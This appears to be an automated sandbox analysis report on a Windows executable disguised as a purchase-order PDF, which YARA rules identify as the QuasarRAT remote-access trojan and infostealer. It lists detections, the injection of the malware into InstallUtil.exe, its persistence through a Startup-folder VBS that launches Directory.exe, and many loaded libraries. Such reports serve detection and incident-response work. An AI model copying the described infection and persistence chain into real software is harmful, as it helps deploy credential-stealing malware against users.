                    Source: Yara matchFile source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4584532065.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4592317023.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2200782194.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO#83298373729383838392387373873PDF.exe PID: 6500, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7116, type: MEMORYSTR

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 2.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 2.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 2.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: PO#83298373729383838392387373873PDF.exe
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D57B8 NtResumeThread,0_2_029D57B8
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D3510 NtProtectVirtualMemory,0_2_029D3510
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D57B2 NtResumeThread,0_2_029D57B2
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D35D8 NtProtectVirtualMemory,0_2_029D35D8
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D3508 NtProtectVirtualMemory,0_2_029D3508
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_010BD8E00_2_010BD8E0
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_010B9B600_2_010B9B60
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_010BA1B80_2_010BA1B8
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_010BA1C80_2_010BA1C8
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_010B9B510_2_010B9B51
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D32600_2_029D3260
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D00400_2_029D0040
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D32520_2_029D3252
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D00060_2_029D0006
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D3F740_2_029D3F74
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D25800_2_029D2580
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D6D000_2_029D6D00
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_029D256F0_2_029D256F
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_075100400_2_07510040
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_075100060_2_07510006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0289EFE42_2_0289EFE4
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO#83298373729383838392387373873PDF.exe
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2236029505.0000000006515000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNilcdbvgzd.exe6 vs PO#83298373729383838392387373873PDF.exe
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTmrgxiqkaw.dll" vs PO#83298373729383838392387373873PDF.exe
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239876609.0000000006BD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO#83298373729383838392387373873PDF.exe
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000000.2115008582.00000000006D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNilcdbvgzd.exe6 vs PO#83298373729383838392387373873PDF.exe
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2198261378.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO#83298373729383838392387373873PDF.exe
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002DE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs PO#83298373729383838392387373873PDF.exe
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002B71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO#83298373729383838392387373873PDF.exe
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs PO#83298373729383838392387373873PDF.exe
                    Source: PO#83298373729383838392387373873PDF.exeBinary or memory string: OriginalFilenameNilcdbvgzd.exe6 vs PO#83298373729383838392387373873PDF.exe
                    Source: PO#83298373729383838392387373873PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 2.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 2.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 2.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, I6AUjuY70VsUewGWtXT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, I6AUjuY70VsUewGWtXT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, I6AUjuY70VsUewGWtXT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, I6AUjuY70VsUewGWtXT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@6/3@2/2
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\Local\6f944778-8605-497c-8352-72cfc43e0986
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs"
                    Source: PO#83298373729383838392387373873PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: PO#83298373729383838392387373873PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: PO#83298373729383838392387373873PDF.exeReversingLabs: Detection: 23%
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeFile read: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe "C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe"
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Directory.exe "C:\Users\user\AppData\Roaming\Directory.exe"
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Directory.exe "C:\Users\user\AppData\Roaming\Directory.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mrmcorer.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: thumbcache.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: mskeyprotect.dllJump to behavior
